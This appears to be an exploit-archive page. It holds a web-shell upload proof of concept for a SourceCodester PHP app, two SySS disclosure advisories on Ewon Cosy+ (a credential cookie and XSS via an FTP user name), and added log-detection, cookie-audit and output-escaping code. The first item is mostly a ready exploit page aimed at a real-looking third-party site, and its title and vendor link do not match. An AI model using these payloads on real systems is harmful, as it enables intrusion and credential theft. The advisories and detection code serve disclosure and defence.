<pre><code>=============================================================================================================================================<br />| # Title : Event Registration and Attendance System 1.0 wysiwyg code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] infected item : admin_class.php<br /><br /> $data .= ", content = '".htmlentities(str_replace("'","&#x2019;",$content))."' ";<br /> if(!empty($_FILES['cover']['tmp_name'])){<br /> $fname = strtotime(date("Y-m-d H:i"))."_".(str_replace(" ","-",$_FILES['cover']['name']));<br /> $move = move_uploaded_file($_FILES['cover']['tmp_name'],'../assets/uploads/content_images/'. 
$fname);<br /> $protocol = strtolower(substr($_SERVER["SERVER_PROTOCOL"],0,5))=='https'?'https':'http';<br /> $hostName = $_SERVER['HTTP_HOST'];<br /> $path =explode('/',$_SERVER['PHP_SELF']);<br /> $currentPath = '/'.$path[1]; <br /> if($move){<br /> $data .= ", cover_img='$fname' ";<br /> }<br /> }<br /> <br />[+] Line 27 : Set your target url.<br /><br />[+] This payload is WYSIWYG-based: the page can be edited remotely and a malicious executable file can be uploaded via Summernote, a WYSIWYG editor (version 0.8.18).<br /><br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Manage About Page</title><br /> <!-- Include Summernote CSS and jQuery --><br /> <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet"><br /> <link href="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.css" rel="stylesheet"><br /> <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script><br /> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script><br /> <script src="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.js"></script><br /></head><br /><body><br /> <div class="container mt-5"><br /> <div class="col-lg-12"><br /> <div class="card card-outline card-primary"><br /> <div class="card-body"><br /> <form action="" id="manage-about"><br /> <div class="form-group"><br /> <textarea name="content" id="content" cols="30" rows="10" class="summernote2 form-control"><br /> <p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: 'Open Sans', Arial, sans-serif; font-size: 14px;">indoushka.</p><br /> </textarea><br /> </div><br /> </form><br /> </div><br /> <div 
class="card-footer border-top border-info"><br /> <div class="d-flex w-100 justify-content-center align-items-center"><br /> <button class="btn btn-flat bg-gradient-primary mx-2" form="manage-about">Save</button><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /><br /> <script><br /> $(document).ready(function(){<br /> // Initialize Summernote Editor<br /> $('.summernote2').summernote({<br /> height: 300,<br /> toolbar: [<br /> ['style', ['style']],<br /> ['font', ['bold', 'italic', 'underline', 'strikethrough', 'superscript', 'subscript', 'clear']],<br /> ['fontname', ['fontname']],<br /> ['fontsize', ['fontsize']],<br /> ['color', ['color']],<br /> ['para', ['ol', 'ul', 'paragraph', 'height']],<br /> ['table', ['table']],<br /> ['insert', ['link', 'picture']],<br /> ['view', ['undo', 'redo', 'fullscreen', 'codeview', 'help']]<br /> ],<br /> callbacks: {<br /> onImageUpload: function(files) {<br /> saveImg(files[0]); // Handle image upload<br /> }<br /> }<br /> });<br /><br /> // Function to save uploaded image<br /> function saveImg(_file) {<br /> var data = new FormData();<br /> data.append("file", _file);<br /> $.ajax({<br /> data: data,<br /> type: "POST",<br /> url: "http://www.news.witnessradio.org/admin/ajax.php?action=save_image",<br /> cache: false,<br /> contentType: false,<br /> processData: false,<br /> success: function(resp) {<br /> var image = $('<img>').attr('src', resp);<br /> $('.summernote2').summernote("insertNode", image[0]);<br /> }<br /> });<br /> }<br /> });<br /><br /> // Form Submission<br /> $('#manage-about').submit(function(e) {<br /> e.preventDefault();<br /> start_load(); // Start a loading indicator (you need to define this function)<br /> $.ajax({<br /> url: 'http://www.news.witnessradio.org/admin/ajax.php?action=save_about',<br /> data: new FormData($(this)[0]),<br /> cache: false,<br /> contentType: false,<br /> processData: false,<br /> method: 'POST',<br /> type: 'POST',<br /> success: function(resp) {<br /> 
if(resp == 1) {<br /> alert_toast('Data successfully saved', "success");<br /> end_load(); // End the loading indicator (you need to define this function)<br /> }<br /> }<br /> });<br /> });<br /><br /> // Optional: Define start_load and end_load functions<br /> function start_load() {<br /> // Add your loading indicator logic here<br /> }<br /><br /> function end_load() {<br /> // Remove your loading indicator logic here<br /> }<br /><br /> function alert_toast(message, type) {<br /> alert(message); // Basic alert. Replace with a better toast notification if needed.<br /> }<br /> </script><br /></body><br /></html><br /><br /><br />[+] path of evil : http://127.0.0.1/news_portal/assets/uploads/content_images/shell.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
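<p>A detection sketch for the upload path described above, added here as an example and not part of the original advisory: it scans web server access logs for requests to script-type files under <code>assets/uploads/content_images/</code> and notes whether the same client previously posted to <code>ajax.php?action=save_image</code>. The log lines are constructed, and the extension list and the Apache combined log format are assumptions.</p>

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Aug/2024:10:01:02 +0000] "POST /news_portal/admin/ajax.php?action=save_image HTTP/1.1" 200 64 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Aug/2024:10:01:09 +0000] "GET /news_portal/assets/uploads/content_images/1723456860_notes.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.20 - - [12/Aug/2024:10:05:00 +0000] "GET /news_portal/assets/uploads/content_images/1723456800_cover.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
203.0.113.20 - - [12/Aug/2024:10:06:00 +0000] "GET /news_portal/assets/uploads/content_images/1723456740_pic.PhP%20 HTTP/1.1" 404 0 "-" "curl/8.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOAD_DIR = "/assets/uploads/content_images/"  # upload directory named in the advisory
UPLOAD_ENDPOINT = "/admin/ajax.php"             # endpoint named in the advisory
# Extensions a PHP-enabled server may execute (assumed list; adjust to the server config).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}


def is_script_name(filename):
    """True if any extension segment is executable, so 'a.php.jpg' is caught too."""
    segments = filename.strip(" .").lower().split(".")
    return any(seg in SCRIPT_EXTS for seg in segments[1:])


def find_upload_execution(log_text):
    """Return requests for script-type files inside the image upload directory."""
    uploaders = set()   # clients that called the image upload action earlier in the log
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if (m["method"] == "POST" and url.path.endswith(UPLOAD_ENDPOINT)
                and "action=save_image" in url.query):
            uploaders.add(m["ip"])
            continue
        path = unquote(url.path)  # decode %xx so encoded suffixes cannot hide the extension
        if UPLOAD_DIR in path and is_script_name(path.rsplit("/", 1)[-1]):
            findings.append({
                "ip": m["ip"],
                "path": path,
                "status": int(m["status"]),
                "uploaded_first": m["ip"] in uploaders,
            })
    return findings


if __name__ == "__main__":
    for finding in find_upload_execution(SAMPLE_LOG):
        print(finding)
```

<p>A finding with status 200 and <code>uploaded_first</code> set deserves priority: the file exists in the upload directory and the same client used the upload action shortly before requesting it.</p>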
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-017<br />Product: Ewon Cosy+<br />Manufacturer: HMS Industrial Networks AB<br />Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3<br />Tested Version(s): Firmware Version: 21.2s7<br />Vulnerability Type: Cleartext Storage of Sensitive Information in a Cookie (CWE-315)<br />Risk Level: Low<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-03-27<br />Solution Date: 2024-07-18<br />Public Disclosure: 2024-08-11<br />CVE Reference: CVE-2024-33892<br />Author of Advisory: Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The Ewon Cosy+ is a VPN gateway used for remote access and maintenance<br />in industrial environments.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The Ewon Cosy+ gateway establishes a secure VPN connection between<br />the machine (PLC, HMI, or other devices) and the remote engineer.<br />The connection happens through Talk2m, a highly secured industrial<br />cloud service. The Ewon Cosy+ makes industrial remote access easy<br />and secure like never before!"<br /><br />Due to cleartext storage of the password in a cookie, an attacker with<br />appropriate access is able to retrieve the plaintext administrative<br />password.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The credentials used for the basic authentication against the web<br />interface of Cosy+ are stored in the cookie "credentials" after a<br />successful login.<br /><br />An attacker with access to a victim's browser is able to retrieve the<br />administrative password of Cosy+.<br /><br />In addition, the cookie is not secured (no HttpOnly, Secure or<br />SameSite attribute is set). 
Thus, the credentials could also be extracted<br />in combination with cross-site scripting (XSS) vulnerabilities.<br /><br />Note: During the responsible disclosure process, SySS GmbH became aware of<br />CVE-2015-7928[8], which describes an issue with password autocomplete<br />in Ewon devices. Since this function contains the problematic cookie,<br />this CVE may already describe the insecure cookie. SySS GmbH would therefore<br />like to credit the reporter of CVE-2015-7928, Karn Ganeshen.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />1. "credentials" cookie value: YWRtOlN1cDNyUzNjcjN0IyM=<br /><br />2. Decoded credentials:<br /> #> echo -n "YWRtOlN1cDNyUzNjcjN0IyM=" | base64 -d<br /> adm:Sup3rS3cr3t##<br /><br />Bonus: accessing the cookie from JavaScript code:<br /><script>alert("Credentials can be access via JavaScript" + document.cookie)</script><br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />According to the manufacturer note[4], the vulnerability was fixed<br />with the firmware versions 21.2s10 and 22.1s3.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-03-26: Vulnerability discovered<br />2024-03-27: Vulnerability reported to manufacturer<br />2024-04-02: Inquiry about the status<br />2024-04-05: Manufacturer acknowledged the vulnerability and started the<br /> analysis<br />2024-04-10: Two more vulnerabilities reported to the manufacturer<br /> (SYSS-2024-032 and SYSS-2024-033)<br />2024-04-11: Manufacturer acknowledged the vulnerabilities and asked for<br /> a publication date for all findings<br />2024-04-12: Proposed dates for a discussion about publication<br />2024-04-15: Manufacturer sent a technical overview of planned remediation<br /> actions and details about the planned timeline<br />2024-04-15: 
Acknowledged the remediation actions and asked the manufacturer<br /> to assign a CVE ID<br />2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer<br />2024-05-31: Manufacturer informed that the fix is in completion stage and<br /> asked if the blog post[6] can be reviewed by HMS<br />2024-06-04: Proposed dates to review the blog post draft<br />2024-06-21: Inquiry about the status<br />2024-06-21: Received an out-of-office auto reply<br />2024-07-01: Inquiry about the status<br />2024-07-04: Inquiry about the status<br />2024-07-12: Inquiry about the status and letting the manufacturer know that<br /> the vulnerability will be published within a talk at DEF CON[7]<br /> in August<br />2024-07-12: Manufacturer responded that the fix is planned by the end of<br /> July; manufacturer asked again for reviewing the blog post<br /> draft<br />2024-07-12: Again confirmed reviewing the blog post is possible and asking<br /> for the sending of details<br />2024-07-17: Blog post provided to HMS<br />2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS<br />2024-07-23: Inquiry about the status<br />2024-07-23: Manufacturer reviewed the blog post and confirmed that a<br /> fix is provided<br />2024-07-29: Discussion with HMS about the blog post and final publication<br /> actions<br />2024-08-11: Vulnerability disclosed at DEF CON[7]<br />2024-08-11: Blog post published[6]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Ewon Cosy+ product website<br /> https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet<br />[2] SySS Security Advisory SYSS-2024-017<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-017.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] Manufacturer note<br /> 
https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf<br />[5] CVE-2024-33892<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33892<br />[6] Blog post<br /> https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/<br />[7] DEF CON talk<br /> https://defcon.org/html/defcon-32/dc-32-speakers.html#54521<br />[8] CVE-2015-7928<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7928<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Abrell of SySS GmbH.<br /><br />E-Mail:moritz.abrell@syss.de<br />Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. 
The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL:http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
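<p>An audit check for the weakness in SYSS-2024-017, added here as an example and not part of the original advisory: it inspects a <code>Set-Cookie</code> header for the missing HttpOnly, Secure and SameSite attributes and tests whether the value is base64 of a <code>user:password</code> pair. The cookie name and value come from the PoC; the <code>Path=/</code> attribute and the hardened <code>session</code> cookie are assumptions.</p>

```python
import base64
import binascii
from urllib.parse import unquote

# Constructed headers. WEAK uses the cookie name and value shown in the PoC;
# "Path=/" is an assumption. HARDENED is a hypothetical opaque session cookie.
WEAK = "credentials=YWRtOlN1cDNyUzNjcjN0IyM=; Path=/"
HARDENED = "session=k3-Zq_8Tn1xV0b-R; Path=/; HttpOnly; Secure; SameSite=Strict"

REQUIRED_ATTRS = ("HttpOnly", "Secure", "SameSite")


def basic_auth_user(value):
    """Return the user name if value is base64 of 'user:password', else None."""
    raw = unquote(value.strip('"'))
    try:
        text = base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None  # not base64, or not text: treated as an opaque token
    user, sep, password = text.partition(":")
    if sep and user and password and text.isprintable():
        return user
    return None


def audit_set_cookie(header_value):
    """Report missing protective attributes and cleartext credentials for one cookie."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    present = {p.partition("=")[0].strip().lower() for p in parts[1:] if p}
    return {
        "cookie": name,
        "missing_attributes": [a for a in REQUIRED_ATTRS if a.lower() not in present],
        # Only the user name is reported; the password is never returned or logged.
        "cleartext_user": basic_auth_user(value),
    }


if __name__ == "__main__":
    for header in (WEAK, HARDENED):
        print(audit_set_cookie(header))
```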
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2024-016<br />Product: Ewon Cosy+<br />Manufacturer: HMS Industrial Networks AB<br />Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3<br />Tested Version(s): Firmware Version: 21.2s7<br />Vulnerability Type: Improper Neutralization of Input During Web Page Generation (CWE-79)<br />Risk Level: Medium<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-03-27<br />Solution Date: 2024-07-18<br />Public Disclosure: 2024-08-11<br />CVE Reference: CVE-2024-33893<br />Author of Advisory: Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The Ewon Cosy+ is a VPN gateway used for remote access and maintenance<br />in industrial environments.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The Ewon Cosy+ gateway establishes a secure VPN connection between<br />the machine (PLC, HMI, or other devices) and the remote engineer.<br />The connection happens through Talk2m, a highly secured industrial<br />cloud service. 
The Ewon Cosy+ makes industrial remote access easy<br />and secure like never before!"<br /><br />Due to improper neutralization of input, an unauthenticated attacker<br />is able to inject HTML and JavaScript code into the administrative<br />web interface of the device.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />If login against the FTP service of the Cosy+ fails, the submitted<br />username is saved in a log.<br />This log is included in the Cosy+ web interface without neutralizing<br />the content.<br />As a result, an unauthenticated attacker is able to inject<br />HTML/JavaScript code via the username of an FTP login attempt.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />1. Login attempt against Cosy+ FTP service:<br /> #> ftp "<script src=//x>"@192.168.10.33<br /><br />2. JavaScript is included when visiting the event logs on Cosy+ web<br /> interface (http://192.168.10.33/index.shtm#EVLogsTbl):<br /><br /> <div class="x-grid-cell-inner " style="text-align:left;"><br /> eftp-Close FTP session (User: <script src="//x"><br /> </div"><br /><br />Note:<br /> The FTP username is limited to 16 characters and therefore the<br /> payload length is limited too.<br /> However, exploitation is still possible, e.g. by controlling<br /> DNS responses or using short URLs, e.g. 
an emoji domain.<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />According to the manufacturer note[4], the vulnerability was fixed<br />with the firmware versions 21.2s10 and 22.1s3.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-03-26: Vulnerability discovered<br />2024-03-27: Vulnerability reported to manufacturer<br />2024-04-02: Inquiry about the status<br />2024-04-05: Manufacturer acknowledged the vulnerability and started the<br /> analysis<br />2024-04-10: Two more vulnerabilities reported to the manufacturer<br /> (SYSS-2024-032 and SYSS-2024-033)<br />2024-04-11: Manufacturer acknowledged the vulnerabilities and asked for<br /> a publication date for all findings<br />2024-04-12: Proposed dates for a discussion about publication<br />2024-04-15: Manufacturer sent a technical overview of planned remediation<br /> actions and details about the planned timeline<br />2024-04-15: Acknowledged the remediation actions and asked the manufacturer<br /> to assign a CVE ID<br />2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer<br />2024-05-31: Manufacturer informed that the fix is in completion stage and<br /> asked if the blog post[6] can be reviewed by HMS<br />2024-06-04: Proposed dates to review the blog post draft<br />2024-06-21: Inquiry about the status<br />2024-06-21: Received an out-of-office auto reply<br />2024-07-01: Inquiry about the status<br />2024-07-04: Inquiry about the status<br />2024-07-12: Inquiry about the status and letting the manufacturer know that<br /> the vulnerability will be published within a talk at DEF CON[7]<br /> in August<br />2024-07-12: Manufacturer responded that the fix is planned by the end of<br /> July; manufacturer asked again for reviewing the blog post<br /> draft<br />2024-07-12: Again confirmed reviewing the blog post is possible and asking<br /> 
for the sending of details<br />2024-07-17: Blog post provided to HMS<br />2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS<br />2024-07-23: Inquiry about the status<br />2024-07-23: Manufacturer reviewed the blog post and confirmed that a<br /> fix is provided<br />2024-07-29: Discussion with HMS about the blog post and final publication<br /> actions<br />2024-08-11: Vulnerability disclosed at DEF CON[7]<br />2024-08-11: Blog post published[6]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Ewon Cosy+ product website<br /> https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet<br />[2] SySS Security Advisory SYSS-2024-016<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-016.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] Manufacturer note<br /> https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf<br />[5] CVE-2024-33893<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33893<br />[6] Blog post<br /> https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/<br />[7] DEF CON talk<br /> https://defcon.org/html/defcon-32/dc-32-speakers.html#54521<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Abrell of SySS GmbH.<br /><br />E-Mail:moritz.abrell@syss.de<br />Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br 
/>and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL:http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
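<p>The log-rendering flaw in SYSS-2024-016, shown as an added example that is not part of the original advisory and not the device's code: one function reproduces the described behaviour of placing log text into the page unchanged, one neutralizes it on output, and one flags FTP user names in event logs that contain unexpected characters. The closing parenthesis of the log message, the second sample entry and the allowed character set are assumptions.</p>

```python
import html
import re

# Constructed event-log messages. The "eftp-Close FTP session (User: ..." text is
# taken from the PoC output; the closing ")" and the second entry are assumptions.
SAMPLE_EVENTS = [
    "eftp-Close FTP session (User: <script src=//x>)",
    "eftp-Close FTP session (User: adm)",
]

USER_RE = re.compile(r"\(User: (?P<user>.*)\)$")
# Assumed set of characters for legitimate user names; 16-character limit per the advisory.
EXPECTED_USER = re.compile(r"^[A-Za-z0-9._@-]{1,16}$")


def render_cell_unsafe(message):
    """Behaviour described in the advisory: log text is placed into the page as-is."""
    return '<div class="x-grid-cell-inner">' + message + "</div>"


def render_cell(message):
    """Neutralize on output so user-controlled text becomes inert character data."""
    return '<div class="x-grid-cell-inner">' + html.escape(message) + "</div>"


def suspicious_usernames(messages):
    """Return user names from FTP session events that contain unexpected characters."""
    hits = []
    for msg in messages:
        m = USER_RE.search(msg)
        if m and not EXPECTED_USER.match(m["user"]):
            hits.append(m["user"])
    return hits


if __name__ == "__main__":
    print(render_cell_unsafe(SAMPLE_EVENTS[0]))
    print(render_cell(SAMPLE_EVENTS[0]))
    print(suspicious_usernames(SAMPLE_EVENTS))
```

<p>Escaping at render time covers every log source, while the user name check is a detection aid for logs already collected from unpatched firmware.</p>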